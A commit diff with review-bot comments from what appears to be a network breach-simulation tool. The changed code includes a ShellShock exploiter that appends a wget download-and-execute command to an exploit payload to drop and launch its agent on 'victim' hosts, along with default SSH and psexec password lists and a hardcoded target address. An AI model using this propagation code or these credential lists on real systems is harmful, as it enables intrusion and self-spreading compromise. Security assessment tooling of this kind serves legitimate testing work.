PEP 8 changes

daniel goldberg 2016-08-29 13:48:00 +03:00
parent 1806f9bc62
commit cd27438a1e
3 changed files with 17 additions and 18 deletions


@ -135,7 +135,7 @@ class Configuration(object):
scanner_class = TcpScanner scanner_class = TcpScanner
finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger] finger_classes = [SMBFinger, SSHFinger, PingScanner, HTTPFinger]
exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits exploiter_classes = [SmbExploiter, WmiExploiter, RdpExploiter, Ms08_067_Exploiter, # Windows exploits
SSHExploiter, ShellShockExploiter #Linux SSHExploiter #Linux
] ]
# how many victims to look for in a single scan iteration # how many victims to look for in a single scan iteration
@ -167,11 +167,11 @@ class Configuration(object):
########################### ###########################
# Auto detect and scan local subnets # Auto detect and scan local subnets
local_network_scan = True local_network_scan = False
range_class = FixedRange range_class = FixedRange
range_size = 1 range_size = 1
range_fixed = [''] range_fixed = ['10.0.1.160']
# TCP Scanner # TCP Scanner
HTTP_PORTS = [80, 8080, 443, HTTP_PORTS = [80, 8080, 443,
@ -201,7 +201,7 @@ class Configuration(object):
psexec_passwords = ["Password1!", "1234", "password", "12345678"] psexec_passwords = ["Password1!", "1234", "password", "12345678"]
# ssh exploiter # ssh exploiter
ssh_users = ["root"] ssh_users = ["root",'user']
ssh_passwords = ["Password1!", "1234", "password", "12345678"] ssh_passwords = ["Password1!", "1234", "password", "12345678"]
# rdp exploiter # rdp exploiter
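Review bot: Four runtime defaults change in a commit titled as style-only, assuming the right-hand column is the new side (the PEP 8 fixes in the exploiter file point that way): `local_network_scan` becomes `False`, `range_fixed` gains the literal `'10.0.1.160'`, `ssh_users` gains `'user'`, and `ShellShockExploiter` leaves `exploiter_classes`. These read like a local test setup, and a fixed address in the shipped defaults means a run with an unedited config is scoped to whatever host holds that address on the operator's network rather than to a deliberately chosen range. Keep `range_fixed = ['']` and the previous defaults here and put lab values in a local override, or move the behaviour change into its own commit whose message says so. The new `["root",'user']` also mixes quote styles and drops the space after the comma, which a PEP 8 pass would normally fix: `ssh_users = ["root", "user"]`.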


@ -16,7 +16,6 @@ __author__ = 'danielg'
LOG = logging.getLogger(__name__) LOG = logging.getLogger(__name__)
TIMEOUT = 2 TIMEOUT = 2
DOWNLOAD_TIMEOUT = 60
TEST_COMMAND = '/bin/uname -a' TEST_COMMAND = '/bin/uname -a'
DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder DOWNLOAD_TIMEOUT = 60 # copied from rdpgrinder
@ -46,7 +45,7 @@ class ShellShockExploiter(HostExploiter):
LOG.info( LOG.info(
'Scanning %s, ports [%s] for vulnerable CGI pages' % ( 'Scanning %s, ports [%s] for vulnerable CGI pages' % (
host, ",".join([str(port[0]) for port in valid_ports])) host, ",".join([str(port[0]) for port in valid_ports]))
) )
attackable_urls = [] attackable_urls = []
@ -92,15 +91,14 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc) LOG.debug("Error running uname machine commad on victim %r: (%s)", host, exc)
return False return False
src_path = src_path or get_target_monkey(host)
# copy the monkey # copy the monkey
dropper_target_path_linux = self._config.dropper_target_path_linux dropper_target_path_linux = self._config.dropper_target_path_linux
if (self.skip_exist) and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): if self.skip_exist and (self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.info("Host %s was already infected under the current configuration, done" % host) LOG.info("Host %s was already infected under the current configuration, done" % host)
return True # return already infected return True # return already infected
src_path = src_path or get_target_monkey(host)
if not src_path: if not src_path:
LOG.info("Can't find suitable monkey executable for host %r", host) LOG.info("Can't find suitable monkey executable for host %r", host)
return False return False
@ -111,17 +109,17 @@ class ShellShockExploiter(HostExploiter):
LOG.debug("Exploiter ShellShock failed, http transfer creation failed.") LOG.debug("Exploiter ShellShock failed, http transfer creation failed.")
return False return False
download_command = '/usr/bin/wget %s -O %s;' % ( download_command = '/usr/bin/wget %s -O %s;' % (
http_path, dropper_target_path_linux) http_path, dropper_target_path_linux)
download_and_run = exploit + download_command download = exploit + download_command
resp = self.attack_page(url, header, download_and_run) self.attack_page(url, header, download)
http_thread.join(DOWNLOAD_TIMEOUT) http_thread.join(DOWNLOAD_TIMEOUT)
http_thread.stop() http_thread.stop()
if (http_thread.downloads != 1) or ('ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)): if (http_thread.downloads != 1) or (
'ELF' not in self.check_remote_file_exists(url, header, exploit, dropper_target_path_linux)):
LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__) LOG.debug("Exploiter %s failed, http download failed." % self.__class__.__name__)
continue continue
@ -134,12 +132,12 @@ class ShellShockExploiter(HostExploiter):
cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG) cmdline = "%s %s" % (dropper_target_path_linux, MONKEY_ARG)
cmdline += build_monkey_commandline(host, depth - 1) + ' & ' cmdline += build_monkey_commandline(host, depth - 1) + ' & '
run_path = exploit + cmdline run_path = exploit + cmdline
resp = self.attack_page(url, header, run_path) self.attack_page(url, header, run_path)
LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)",
self._config.dropper_target_path_linux, host, cmdline) self._config.dropper_target_path_linux, host, cmdline)
if not (self.check_remote_file_exists(url,header,exploit,self._config.monkey_log_path_linux)): if not (self.check_remote_file_exists(url, header, exploit, self._config.monkey_log_path_linux)):
LOG.info("Failed running the monkey, log file does not exist") LOG.info("Failed running the monkey, log file does not exist")
continue continue
@ -206,7 +204,7 @@ class ShellShockExploiter(HostExploiter):
return urls return urls
@staticmethod @staticmethod
def report_vuln_shellshock(host,url): def report_vuln_shellshock(host, url):
from control import ControlClient from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__, ControlClient.send_telemetry('exploit', {'result': False, 'machine': host.__dict__,
'exploiter': ShellShockExploiter.__name__, 'exploiter': ShellShockExploiter.__name__,
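Review bot: In the run step, the `LOG.info("Executed monkey '%s' on remote victim %r (cmdline=%r)", ...)` entry is written before the `monkey_log_path_linux` check that confirms the agent started, and the `attack_page` return value is not inspected, so the log records an execution even on hosts where the next branch reports "Failed running the monkey". For an assessment tool this log is what operators rely on to decide which machines need cleanup, so the info-level entry should reflect confirmed state. Move the `LOG.info` call below the `check_remote_file_exists` test, or keep it in place with wording that claims only what is known, such as `"Sent run command for monkey '%s' to %r (cmdline=%r)"`. The enclosing method starts and ends outside the visible hunks, so the ordering should be confirmed against the full body.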


@ -425,4 +425,5 @@ def report_failed_login(exploiter, machine, user, password):
from control import ControlClient from control import ControlClient
ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__, ControlClient.send_telemetry('exploit', {'result': False, 'machine': machine.__dict__,
'exploiter': exploiter.__class__.__name__, 'exploiter': exploiter.__class__.__name__,
'user':user,'password':password}) 'user':user,'password':password})